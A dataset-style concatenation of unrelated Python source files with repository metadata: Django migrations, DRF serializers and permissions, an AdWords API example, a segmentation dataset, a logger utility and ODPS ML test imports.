db.add_column('gmecol_game', 'image_url',
self.gf('django.db.models.fields.TextField')(default=1),
keep_default=False)
# Adding field 'Game.remote_id'
db.add_column('gmecol_game', 'remote_id',
self.gf('django.db.models.fields.IntegerField')(default=1),
keep_default=False)
# Adding field 'Platform.image_url'
db.add_column('gmecol_platform', 'image_url',
self.gf('django.db.models.fields.TextField')(default=1),
keep_default=False)
# Adding field 'Platform.remote_id'
db.add_column('gmecol_platform', 'remote_id',
self.gf('django.db.models.fields.IntegerField')(default=1),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Game.image_url'
db.delete_column('gmecol_game', 'image_url')
# Deleting field 'Game.remote_id'
db.delete_column('gmecol_game', 'remote_id')
# Deleting field 'Platform.image_url'
db.delete_column('gmecol_platform', 'image_url')
# Deleting field 'Platform.remote_id'
db.delete_column('gmecol_platform', 'remote_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'gmecol.game': {
'Meta': {'object_name': 'Game'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_url': ('django.db.models.fields.TextField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'platform': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gmecol.Platform']"}),
'remote_id': ('django.db.models.fields.IntegerField', [], {}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'gmecol.platform': {
'Meta': {'object_name': 'Platform'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_url': ('django.db.models.fields.TextField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'remote_id': ('django.db.models.fields.IntegerField', [], {}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'gmecol.usergame': {
'Meta': {'object_name': 'UserGame'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'for_sale': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'for_trade': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gmecol.Game']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'rating': ('django.db.models.fields.IntegerField', [], {'default': '3'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gmecol.UserProfile']"})
},
'gmecol.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'games': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['gmecol.Game']", 'through': "orm['gmecol.UserGame']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'platforms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['gmecol.Platform']", 'symmetrical': 'False'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['gmecol']
|
[
"f4nt@f4ntasmic.com"
] |
f4nt@f4ntasmic.com
|
9c37792e8f94df710b6d3440b26852c0adaa94e4
|
79baf4404e51bdc0f33038b3b16bea86ff09e82f
|
/azext_iot/tests/digitaltwins/test_dt_generic_unit.py
|
0893dc929dab4b65fd9bf2a07dadc07136a01af7
|
[
"MIT"
] |
permissive
|
Azure/azure-iot-cli-extension
|
80b6cb29e907f7512c7361a85d6bfdea5ae2dd9e
|
bdbe65c3874ff632c2eba25c762e9ea8e9175b5f
|
refs/heads/dev
| 2023-09-04T10:57:16.118442
| 2023-08-28T17:12:05
| 2023-08-28T17:12:05
| 103,456,760
| 95
| 80
|
NOASSERTION
| 2023-09-13T00:02:54
| 2017-09-13T22:04:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,280
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import pytest
from azext_iot.digitaltwins.providers import generic as subject
class TestLROCheckStateHelper(object):
@pytest.mark.parametrize(
"test_input", [
{},
{"foo": "bar"},
{"provisioning_state": "bar"},
{"properties": {"foo": "bar"}},
{"properties": {"provisioning_state": "foo"}},
{"provisioning_state": "bar", "properties": {"provisioning_state": "foo"}}
]
)
def test_get_provisioning_state(self, test_input):
output = subject._get_provisioning_state(test_input)
if test_input.get("provisioning_state"):
assert output == test_input["provisioning_state"]
elif test_input.get("properties") and test_input.get("properties").get("provisioning_state"):
assert output == test_input["properties"]["provisioning_state"]
else:
assert output is None
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
2e5c9db597970c087922fe5fb4e821040099e528
|
d92ce9a32bf20086e30701585a4e73c1f2469aff
|
/FunDooapp/virtualenv/bin/pyreverse
|
4bb367f33b44c24c82bc7034882867f23526d633
|
[] |
no_license
|
Prem-chouhan/fellowshipProgram_PremsinghChouhan
|
f61cf4407458f14ef7eb6d80effb25f9592d2552
|
33e6b57f6c75a80d8a3d1f868d379e85365a1336
|
refs/heads/master
| 2020-09-14T12:45:16.269268
| 2019-12-23T14:24:10
| 2019-12-23T14:24:10
| 223,128,906
| 0
| 1
| null | 2020-07-22T11:50:46
| 2019-11-21T08:47:28
|
Python
|
UTF-8
|
Python
| false
| false
| 271
|
#!/home/admin-1/PycharmProjects/FunDooapp/virtualenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_pyreverse
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run_pyreverse())
|
[
"antonyalexcm@gmail.com"
] |
antonyalexcm@gmail.com
|
|
b4f53d695d80feab5e9b69fa72d78e8512187c80
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_affiliations.py
|
42384cf4a16916f7866a17a2fbb1a0dcf5f45e29
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
#calss header
class _AFFILIATIONS():
def __init__(self,):
self.name = "AFFILIATIONS"
self.definitions = affiliation
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['affiliation']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
fed4bdd2449e04bd15775b80ce99c2bf71bc3df3
|
bbe447a740929eaee1955bd9c1517cf760dd5cb9
|
/aralib/adwordsApi/examples/v201003/add_negative_campaign_criterion.py
|
54e653048ddbd0762277bfa7d7600e8aed50b548
|
[
"Apache-2.0"
] |
permissive
|
MujaahidSalie/aranciulla
|
f3d32e7dd68ecfca620fe4d3bf22ecb4762f5893
|
34197dfbdb01479f288611a0cb700e925c4e56ce
|
refs/heads/master
| 2020-09-07T02:16:25.261598
| 2011-11-01T21:20:46
| 2011-11-01T21:20:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,065
|
py
|
#!/usr/bin/python
#
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""This example creates new negative campaign criterion. To create campaign, run
add_campaign.py.
Tags: CampaignCriterionService.mutate
"""
__author__ = 'api.sgrinberg@gmail.com (Stan Grinberg)'
import sys
sys.path.append('../..')
# Import appropriate classes from the client library.
from aw_api.Client import Client
# Initialize client object.
client = Client(path='../..')
# Initialize appropriate service.
campaign_criterion_service = client.GetCampaignCriterionService(
'https://adwords-sandbox.google.com', 'v201003')
# Construct campaign criterion object and add negative campaign criterion.
campaign_id = 'INSERT_CAMPAIGN_ID_HERE'
operations = [{
'operator': 'ADD',
'operand': {
'type': 'NegativeCampaignCriterion',
'campaignId': campaign_id,
'criterion': {
'type': 'Keyword',
'matchType': 'BROAD',
'text': 'jupiter cruise'
}
}
}]
campaign_criterion = campaign_criterion_service.Mutate(
operations)[0]['value'][0]
# Display results.
print ('New negative campaign criterion with \'%s\' id and \'%s\' text was '
'successfully added to \'%s\' campaign.'
% (campaign_criterion['criterion']['id'],
campaign_criterion['criterion']['text'],
campaign_criterion['campaignId']))
print
print ('Usage: %s units, %s operations' % (client.GetUnits(),
client.GetOperations()))
|
[
"vincenzo.ampolo@gmail.com"
] |
vincenzo.ampolo@gmail.com
|
d90727f571830e06611f1580efa36793cde8b63e
|
b08bddd99d49ff242aa890b491cbbdf09ce128f0
|
/apps/login_app/migrations/0004_auto_20170823_1152.py
|
3226750b3561b5ea2af2985e960273767eed143f
|
[] |
no_license
|
HollinRoberts/friends
|
24b99c031a7771ad1b35a22112658f01fe3d8090
|
ae22c690f6800c74b6f794f44eefd97b607d008a
|
refs/heads/master
| 2021-01-20T05:28:42.381205
| 2017-08-25T22:41:21
| 2017-08-25T22:41:21
| 101,447,198
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-23 18:52
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login_app', '0003_auto_20170823_1148'),
]
operations = [
migrations.AddField(
model_name='poke',
name='created_at',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='poke',
name='updated_at',
field=models.DateTimeField(auto_now=True, null=True),
),
]
|
[
"hollinroberts@gmail.com"
] |
hollinroberts@gmail.com
|
c4f9a57a58113e650a9ac005d75441afa0d6d22e
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/stacksNqueues_20200722084452.py
|
d0552e00c0ca213a09d1eebd1be5b92128dad478
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 470
|
py
|
# we'll use a list to rep stack and a queue
# empty list
# stack is last in first out
stack = []
stack.append(1)
stack.append(2)
stack.append(3)
stack.append(4)
# remove item from stack(pop)
x = stack.pop()
from collections import deque
# create empty deque
queue = deque()
queue.append(1)
queue.append(2)
queue.append(3)
queue.append(4)
print(queue)
# remove elements from the front of the list
# Queue is first i f
y = queue.popleft()
print(y)
print(queue)
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
ca9694bf200c7f1b74e093a94f8a7fb7b3f38eb3
|
94f156b362fbce8f89c8e15cd7687f8af267ef08
|
/endterm/main/permissions.py
|
fa03d8dfbbb352fd4d500b5d47d7396758ac8649
|
[] |
no_license
|
DastanB/AdvancedDjango
|
6eee5477cd5a00423972c9cc3d2b5f1e4a501841
|
2b5d4c22b278c6d0e08ab7e84161163fe42e9a3f
|
refs/heads/master
| 2020-07-17T19:21:16.271964
| 2019-12-03T21:58:51
| 2019-12-03T21:58:51
| 206,081,522
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 419
|
py
|
from rest_framework.permissions import IsAuthenticated, BasePermission
from django.contrib.auth.models import User
class ArticlePermission(BasePermission):
message = 'You must be the owner of the project.'
def has_permission(self, request, view):
return True
def has_object_permission(self, request, view, obj):
if view.action is not 'list':
return request.user == obj.creator
|
[
"dastan211298@gmail.com"
] |
dastan211298@gmail.com
|
27612de0eb84d3c9a15217b1cf2ccef7a2e61e91
|
95df12156e4dd24ed3646a93da972ab1a8e654f5
|
/propmix/hpiraw/hpiraw_api_server/hpiraw/dbauth.py
|
046ff02ca76ec3638b865c08fa7bf60437ba96d4
|
[] |
no_license
|
sijuaugustin/ingts
|
1cf05e9acaac85181f82b8442537755a7799e300
|
68df567caa7c581e89eea7130fa8a45cd83a40ae
|
refs/heads/master
| 2020-06-01T15:49:23.620893
| 2017-06-13T06:56:27
| 2017-06-13T06:56:27
| 94,078,907
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
'''
Created on Jan 6, 2017
@author: joseph
'''
DATABASE_ACCESS = {'name': 'hpi_api',
'password': 'hpi@!23',
'source': 'cognubauth'
}
|
[
"siju.augustine@cognub.com"
] |
siju.augustine@cognub.com
|
4216ba8538130d5be7bb47ed1e6f3ccb8612f153
|
db4f69e1643b61c411fee9190a3ae8f77ee2db04
|
/polyaxon/api/experiment_groups/serializers.py
|
3bafa236ca3b166d8ecdadbbad365de6ba88f485
|
[
"MIT"
] |
permissive
|
gzcf/polyaxon
|
f159c4138fee5b1f47fb57aa6bda440fe29812fb
|
77ac8838c6444a36541e6c28aba7ae42de392fee
|
refs/heads/master
| 2021-04-18T21:22:54.269899
| 2018-08-24T09:22:22
| 2018-08-24T09:22:22
| 126,830,407
| 0
| 0
|
MIT
| 2018-04-20T18:07:17
| 2018-03-26T13:08:02
|
Python
|
UTF-8
|
Python
| false
| false
| 4,125
|
py
|
from rest_framework import fields, serializers
from rest_framework.exceptions import ValidationError
from api.utils.serializers.bookmarks import BookmarkedSerializerMixin
from db.models.experiment_groups import ExperimentGroup, ExperimentGroupStatus
from libs.spec_validation import validate_group_spec_content
class ExperimentGroupStatusSerializer(serializers.ModelSerializer):
uuid = fields.UUIDField(format='hex', read_only=True)
class Meta:
model = ExperimentGroupStatus
extra_kwargs = {'experiment_group': {'read_only': True}}
exclude = []
class ExperimentGroupSerializer(serializers.ModelSerializer):
uuid = fields.UUIDField(format='hex', read_only=True)
project = fields.SerializerMethodField()
user = fields.SerializerMethodField()
class Meta:
model = ExperimentGroup
fields = (
'id',
'uuid',
'name',
'unique_name',
'user',
'description',
'last_status',
'project',
'created_at',
'updated_at',
'started_at',
'finished_at',
'tags',
'concurrency',
'search_algorithm'
)
def get_project(self, obj):
return obj.project.unique_name
def get_user(self, obj):
return obj.user.username
class ExperimentGroupDetailSerializer(ExperimentGroupSerializer, BookmarkedSerializerMixin):
bookmarked_model = 'experimentgroup'
num_experiments = fields.SerializerMethodField()
num_pending_experiments = fields.SerializerMethodField()
num_running_experiments = fields.SerializerMethodField()
num_scheduled_experiments = fields.SerializerMethodField()
num_succeeded_experiments = fields.SerializerMethodField()
num_failed_experiments = fields.SerializerMethodField()
num_stopped_experiments = fields.SerializerMethodField()
current_iteration = fields.SerializerMethodField()
class Meta(ExperimentGroupSerializer.Meta):
fields = ExperimentGroupSerializer.Meta.fields + (
'current_iteration',
'content',
'hptuning',
'has_tensorboard',
'num_experiments',
'num_pending_experiments',
'num_running_experiments',
'num_scheduled_experiments',
'num_succeeded_experiments',
'num_failed_experiments',
'num_stopped_experiments',
'bookmarked',
)
def get_num_experiments(self, obj):
return obj.experiments__count
def get_num_pending_experiments(self, obj):
return obj.pending_experiments__count
def get_num_running_experiments(self, obj):
return obj.running_experiments__count
def get_num_scheduled_experiments(self, obj):
return obj.scheduled_experiments__count
def get_num_succeeded_experiments(self, obj):
return obj.succeeded_experiments__count
def get_num_failed_experiments(self, obj):
return obj.failed_experiments__count
def get_num_stopped_experiments(self, obj):
return obj.stopped_experiments__count
def get_current_iteration(self, obj):
return obj.iterations__count
def validate_content(self, content):
validate_group_spec_content(content)
return content
def validate(self, attrs):
if self.initial_data.get('check_specification') and not attrs.get('content'):
raise ValidationError('Experiment group expects `content`.')
return attrs
class ExperimentGroupCreateSerializer(ExperimentGroupSerializer):
class Meta(ExperimentGroupSerializer.Meta):
fields = ExperimentGroupSerializer.Meta.fields + (
'search_algorithm',
'content',
)
def validate_content(self, content):
validate_group_spec_content(content)
return content
def validate(self, attrs):
if self.initial_data.get('check_specification') and not attrs.get('content'):
raise ValidationError('Experiment group expects `content`.')
return attrs
|
[
"mouradmourafiq@gmail.com"
] |
mouradmourafiq@gmail.com
|
893dfeefb69b21a01de2a54510f145d36809b70b
|
58bc54ce2f5d4beaac2366bf5b0bb76e51ebfda3
|
/pytorch_toolbelt/datasets/segmentation.py
|
cadd5b4769c66e66c8cb6b0a8d058123710d1111
|
[
"MIT"
] |
permissive
|
anashas/pytorch-toolbelt
|
1fbe76648719b2e1832e9fcbd0b2c30f134882cc
|
a04e28b10a43747ab75f88503ee771f89edf59fb
|
refs/heads/master
| 2023-03-15T00:31:48.045880
| 2021-03-02T20:36:27
| 2021-03-02T20:36:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,487
|
py
|
from functools import partial
from typing import Optional, List, Callable
import albumentations as A
import cv2
import numpy as np
from skimage.measure import block_reduce
from torch.utils.data import Dataset
from .common import (
read_image_rgb,
INPUT_IMAGE_KEY,
INPUT_IMAGE_ID_KEY,
INPUT_INDEX_KEY,
TARGET_MASK_WEIGHT_KEY,
TARGET_MASK_KEY,
name_for_stride,
UNLABELED_SAMPLE,
)
from ..utils import fs, image_to_tensor
__all__ = ["mask_to_bce_target", "mask_to_ce_target", "SegmentationDataset", "compute_weight_mask"]
def mask_to_bce_target(mask):
return image_to_tensor(mask, dummy_channels_dim=True).float()
def mask_to_ce_target(mask):
return image_to_tensor(mask, dummy_channels_dim=False).long()
def compute_weight_mask(mask: np.ndarray, edge_weight=4) -> np.ndarray:
from skimage.morphology import binary_dilation, binary_erosion
binary_mask = mask > 0
weight_mask = np.ones(mask.shape[:2]).astype(np.float32)
if binary_mask.any():
dilated = binary_dilation(binary_mask, structure=np.ones((5, 5), dtype=np.bool))
eroded = binary_erosion(binary_mask, structure=np.ones((5, 5), dtype=np.bool))
a = dilated & ~binary_mask
b = binary_mask & ~eroded
weight_mask = (a | b).astype(np.float32) * edge_weight + 1
weight_mask = cv2.GaussianBlur(weight_mask, ksize=(5, 5), sigmaX=5)
return weight_mask
def _block_reduce_dominant_label(x: np.ndarray, axis):
try:
# minlength is +1 to num classes because we must account for IGNORE_LABEL
minlength = np.max(x) + 1
bincount_fn = partial(np.bincount, minlength=minlength)
counts = np.apply_along_axis(bincount_fn, -1, x.reshape((x.shape[0], x.shape[1], -1)))
reduced = np.argmax(counts, axis=-1)
return reduced
except Exception as e:
print(e)
print("shape", x.shape, "axis", axis)
def read_binary_mask(mask_fname: str) -> np.ndarray:
mask = cv2.imread(mask_fname, cv2.IMREAD_COLOR)
return cv2.threshold(mask, 0, 255, cv2.THRESH_BINARY, dst=mask)
class SegmentationDataset(Dataset):
"""
Dataset class suitable for segmentation tasks
"""
def __init__(
self,
image_filenames: List[str],
mask_filenames: Optional[List[str]],
transform: A.Compose,
read_image_fn: Callable = read_image_rgb,
read_mask_fn: Callable = cv2.imread,
need_weight_mask=False,
need_supervision_masks=False,
make_mask_target_fn: Callable = mask_to_ce_target,
):
if mask_filenames is not None and len(image_filenames) != len(mask_filenames):
raise ValueError("Number of images does not corresponds to number of targets")
self.image_ids = [fs.id_from_fname(fname) for fname in image_filenames]
self.need_weight_mask = need_weight_mask
self.need_supervision_masks = need_supervision_masks
self.images = image_filenames
self.masks = mask_filenames
self.read_image = read_image_fn
self.read_mask = read_mask_fn
self.transform = transform
self.make_target = make_mask_target_fn
def __len__(self):
return len(self.images)
def set_target(self, index: int, value: np.ndarray):
mask_fname = self.masks[index]
value = (value * 255).astype(np.uint8)
cv2.imwrite(mask_fname, value)
def __getitem__(self, index):
image = self.read_image(self.images[index])
if self.masks is not None:
mask = self.read_mask(self.masks[index])
else:
mask = np.ones((image.shape[0], image.shape[1], 1), dtype=np.uint8) * UNLABELED_SAMPLE
data = self.transform(image=image, mask=mask)
image = data["image"]
mask = data["mask"]
sample = {
INPUT_INDEX_KEY: index,
INPUT_IMAGE_ID_KEY: self.image_ids[index],
INPUT_IMAGE_KEY: image_to_tensor(image),
TARGET_MASK_KEY: self.make_target(mask),
}
if self.need_weight_mask:
sample[TARGET_MASK_WEIGHT_KEY] = image_to_tensor(compute_weight_mask(mask)).float()
if self.need_supervision_masks:
for i in range(1, 5):
stride = 2 ** i
mask = block_reduce(mask, (2, 2), partial(_block_reduce_dominant_label))
sample[name_for_stride(TARGET_MASK_KEY, stride)] = self.make_target(mask)
return sample
|
[
"ekhvedchenya@gmail.com"
] |
ekhvedchenya@gmail.com
|
4508094ece806298cf2145b030d29774f438347a
|
e4f8b14cead542586a96bcaa75993b0a29b3c3d0
|
/pyNastran/utils/log.py
|
8b482bf35aacb394dae8997f2100b891fd92ef91
|
[] |
no_license
|
afcarl/cyNastran
|
f1d1ef5f1f7cb05f435eac53b05ff6a0cc95c19b
|
356ee55dd08fdc9880c5ffba47265125cba855c4
|
refs/heads/master
| 2020-03-26T02:09:00.350237
| 2014-08-07T00:00:29
| 2014-08-07T00:00:29
| 144,398,645
| 1
| 0
| null | 2018-08-11T15:56:50
| 2018-08-11T15:56:50
| null |
UTF-8
|
Python
| false
| false
| 5,063
|
py
|
import sys
import platform
import os
def make_log(display=False):
"""
Creates 'pyNastran.log' file with information about working environment,
such as Python version, platform, architecture, etc. Useful for debugging.
:param display: do not only create file but also print log information
"""
smsg = [("sys.version", sys.version), ("sys.version_info", sys.version_info)]
pmsg = ["machine", "platform", "processor", "architecture", "python_branch",
"python_revision", "win32_ver", "version", "uname", "system",
"python_build", "python_compiler", "python_implementation", "system",
"mac_ver", "linux_distribution", "libc_ver"]
fmt = "%-{0}s = %s\n".format(max(map(len, pmsg + [j[0] for j in smsg])))
msg = "".join([fmt % (i, str(j).replace("\n", "; ")) for (i, j) in smsg])
msg += "".join([fmt % (i, str(getattr(platform, i)())) for i in pmsg])
if display:
print(msg)
with open('pyNastran.log', 'wb') as fil:
fil.write(msg)
def stderr_logging(typ, msg):
"""
Default logging function. Takes a text and outputs to stderr.
:param typ: messeage type
:param msg: message to be displayed
Message will have format 'typ: msg'
"""
name = '%-8s' % (typ + ':') # max length of 'INFO', 'DEBUG', 'WARNING',.etc.
sys.stdout.write((name + msg) if typ else msg)
sys.stdout.flush()
class SimpleLogger(object):
"""
Simple logger object. In future might be changed to use Python logging module.
Two levels are supported: 'debug' and 'info'. Info level discards debug
messages, 'debug' level displays all messages.
.. note:: Logging module is currently not supported because I don't
know how to repoint the log file if the program is called a second
time. Poor logging can result in:\n
1) double logging to a single file\n
2) all longging going to one file\n
This is really only an issue when calling logging multiple times,
such as in an optimization loop or testing.
"""
def __init__(self, level='debug', log_func=stderr_logging):
"""
:param level: level of logging: 'info' or 'debug'
:param log_func:
funtion that will be used to print log. It should take one argument:
string that is produces by a logger. Default: print messages to
stderr using @see stderr_logging function.
"""
assert level in ('info','debug')
self.level = level
self.log_func = log_func
def properties(self):
"""Return tuple: line number and filename"""
_fr = sys._getframe(3) # jump to get out of the logger code
return (_fr.f_lineno, os.path.basename(_fr.f_globals['__file__']))
def debug(self, msg):
"""
Log DEBUG message
:param msg: message to be logged
"""
if self.level != 'debug':
return
lines = str(msg).split('\n')
self.msg_typ('DEBUG', ''.join([lines[0]] + [' ' * 54 + line + '\n'
for line in lines[1:]]))
def msg_typ(self, typ, msg):
"""
Log message of a given type
:param typ: type of a message (e.g. INFO)
:param msg: message to be logged
"""
n, fn = self.properties()
self.log_func(typ, ' fname=%-25s lineNo=%-4s %s\n' % (fn, n, msg))
def simple_msg(self,msg, typ = None):
"""
Log message directly without any altering.
:param msg: message to be looged without any alteration.
"""
self.log_func(typ, msg)
def info(self, msg):
"""
Log INFO message
:param msg: message to be logged
"""
self.msg_typ("INFO", msg)
def warning(self, msg):
"""
Log WARNING message
:param msg: message to be logged
"""
self.msg_typ("WARNING", msg)
def error(self, msg):
"""
Log ERROR message
:param msg: message to be logged
"""
self.msg_typ("ERROR", msg)
def exception(self, msg):
"""
Log EXCEPTION message
:param msg: message to be logged
"""
self.msg_typ("ERROR", msg)
def critical(self, msg):
"""
Log CRITICAL message
:param msg: message to be logged
"""
self.msg_typ("CRITICAL", msg)
def get_logger(log=None, level='debug'):
"""
This function is useful as it will instantiate a simpleLogger object if log=None.
:param log: a logger object or None
:param level: level of logging: 'info' or 'debug'
"""
return SimpleLogger(level) if log is None else log
if __name__ == '__main__':
# how to use a simple logger
for nam in ["debug", "info"]:
print('--- %s logger ---' % nam)
test_log = SimpleLogger(nam)
test_log.debug('debug message')
test_log.warning('warning')
test_log.error('errors')
test_log.exception('exception')
make_log(display=True)
|
[
"mesheb82@abe5364a-6225-a519-111c-932ebcde5b3b"
] |
mesheb82@abe5364a-6225-a519-111c-932ebcde5b3b
|
18358ae17ee34ba9ba626dedeb0a03bc901ffec5
|
bc526da042a8d5d2a239989efecb35fd4272e611
|
/odps/ml/regression/tests/test_regression.py
|
674999ee51b95dcb4d72bfbe4ee01d68c24a34df
|
[
"Apache-2.0"
] |
permissive
|
forvendettaw/aliyun-odps-python-sdk
|
595928fff039ae43d2736c53fc27d947def24e35
|
a490a255efd0553cca4454d79ed83b777aae8888
|
refs/heads/master
| 2021-01-12T02:47:31.578957
| 2017-01-05T03:05:06
| 2017-01-05T03:05:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,191
|
py
|
# encoding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
from odps.df import DataFrame
from odps.config import options
from odps.ml.utils import TEMP_TABLE_PREFIX
from odps.ml.regression import *
from odps.ml.feature import *
from odps.ml.statistics import *
from odps.ml.tests.base import MLTestBase, tn, otm, ci_skip_case
from odps.ml.metrics import *
import logging
logger = logging.getLogger(__name__)
IONOSPHERE_TABLE = tn('pyodps_test_ml_ionosphere')
XGBOOST_OUT_TABLE = tn('pyodps_test_xgboost_out')
GBDT_OUT_TABLE = tn('pyodps_test_gbdt_out')
LINEAR_REGRESSION_OUT_TABLE = tn('pyodps_test_linear_reg_out')
LINEAR_SVR_OUT_TABLE = tn('pyodps_test_linear_svr_out')
LASSO_OUT_TABLE = tn('pyodps_test_lasso_out')
